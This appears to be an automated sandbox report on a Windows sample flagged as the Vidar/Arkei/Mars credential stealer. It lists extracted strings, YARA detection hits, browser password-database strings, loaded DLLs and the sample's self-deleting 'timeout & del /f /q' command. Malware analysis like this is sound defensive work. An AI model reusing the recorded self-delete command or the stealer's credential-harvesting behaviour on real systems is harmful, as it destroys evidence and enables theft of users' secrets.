Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.mozilla.com0
Source: ZUKFK6PZ.0.dr String found in binary or memory: https://ac.ecosia.org?q=
Source: ZUKFK6PZ.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: m0wsoI3.exe, 00000000.00000003.1260169616.000000000059C000.00000004.00000020.00020000.00000000.sdmp, ZUKFK6PZ.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: m0wsoI3.exe, 00000000.00000003.1260169616.000000000059C000.00000004.00000020.00020000.00000000.sdmp, ZUKFK6PZ.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ZUKFK6PZ.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: m0wsoI3.exe, 00000000.00000003.1260169616.000000000059C000.00000004.00000020.00020000.00000000.sdmp, ZUKFK6PZ.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: ZUKFK6PZ.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ZUKFK6PZ.0.dr String found in binary or memory: https://gemini.google.com/app?q=
Source: m0wsoI3.exe, 00000000.00000003.1276800018.000000000F417000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1310926889.000000001045F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: m0wsoI3.exe, 00000000.00000002.1310926889.000000001045F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: m0wsoI3.exe, 00000000.00000003.1276800018.000000000F417000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: m0wsoI3.exe, 00000000.00000003.1260169616.000000000059C000.00000004.00000020.00020000.00000000.sdmp, ZUKFK6PZ.0.dr String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: m0wsoI3.exe, 00000000.00000003.1260169616.000000000059C000.00000004.00000020.00020000.00000000.sdmp, ZUKFK6PZ.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: m0wsoI3.exe, 00000000.00000002.1310926889.000000001045F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: m0wsoI3.exe, 00000000.00000003.1276800018.000000000F417000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: m0wsoI3.exe, 00000000.00000002.1310926889.000000001045F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: m0wsoI3.exe, 00000000.00000003.1276800018.000000000F417000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: m0wsoI3.exe, 00000000.00000003.1276800018.000000000F417000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1310926889.000000001045F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig

System Summary

Source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
Source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detect Mars Stealer based on a specific XOR routine Author: Sekoia.io
Source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
Source: 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: Process Memory Space: m0wsoI3.exe PID: 7292, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: decrypted.memstr, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: decrypted.memstr, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: m0wsoI3.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: m0wsoI3.exe Static PE information: section name: (empty; the section header carries no name)
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0041B020 0_2_0041B020
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00410F00 0_2_00410F00
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0041A790 0_2_0041A790
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0041A190 0_2_0041A190
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0041A5A0 0_2_0041A5A0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_004107B0 0_2_004107B0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6095C314 0_2_6095C314
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6094DA3A 0_2_6094DA3A
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609300CC 0_2_609300CC
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609660FA 0_2_609660FA
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6092114F 0_2_6092114F
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6091F2C9 0_2_6091F2C9
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6096923E 0_2_6096923E
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60950312 0_2_60950312
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6094D33B 0_2_6094D33B
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6093B368 0_2_6093B368
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6096748C 0_2_6096748C
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6093F42E 0_2_6093F42E
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60954470 0_2_60954470
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609615FA 0_2_609615FA
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6096A5EE 0_2_6096A5EE
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6096D6A4 0_2_6096D6A4
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609606A8 0_2_609606A8
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60932654 0_2_60932654
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60955665 0_2_60955665
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6094B7DB 0_2_6094B7DB
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60964807 0_2_60964807
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6094E9BC 0_2_6094E9BC
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60937929 0_2_60937929
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6093FAD6 0_2_6093FAD6
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6096DAE8 0_2_6096DAE8
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60936B27 0_2_60936B27
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60954CF6 0_2_60954CF6
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60950C6B 0_2_60950C6B
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60966DF1 0_2_60966DF1
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60963D35 0_2_60963D35
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60909E9C 0_2_60909E9C
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60951E86 0_2_60951E86
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60912E0B 0_2_60912E0B
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60954FF8 0_2_60954FF8
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: String function: 004054F0 appears 577 times
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs m0wsoI3.exe
Source: m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs m0wsoI3.exe
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs m0wsoI3.exe
Source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs m0wsoI3.exe
Source: m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs m0wsoI3.exe
Source: m0wsoI3.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
Source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_mars_stealer_xor_routine author = Sekoia.io, description = Detect Mars Stealer based on a specific XOR routine, creation_date = 2022-04-06, classification = TLP:CLEAR, version = 1.0, id = 3e2c7440b2fc9e4b039e6fa8152ac8ff
Source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
Source: 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: Process Memory Space: m0wsoI3.exe PID: 7292, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: decrypted.memstr, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: decrypted.memstr, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/16@1/1
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\Users\user\Desktop\DBAI5X4O
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Users\user\Desktop\m0wsoI3.exe Mutant created: NULL
Source: C:\Users\user\Desktop\m0wsoI3.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\m0wsoI3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: m0wsoI3.exe, m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: m0wsoI3.exe, m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: m0wsoI3.exe, m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s;
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: CBIEU37Q.0.dr, 2NOH4EKN.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: nss3.dll.0.dr Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
Source: m0wsoI3.exe Virustotal: Detection: 82%
Source: m0wsoI3.exe ReversingLabs: Detection: 83%
Source: unknown Process created: C:\Users\user\Desktop\m0wsoI3.exe "C:\Users\user\Desktop\m0wsoI3.exe"
Source: C:\Users\user\Desktop\m0wsoI3.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\m0wsoI3.exe" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: dbghelp.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: dsrole.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\m0wsoI3.exe Section loaded: sppc.dll
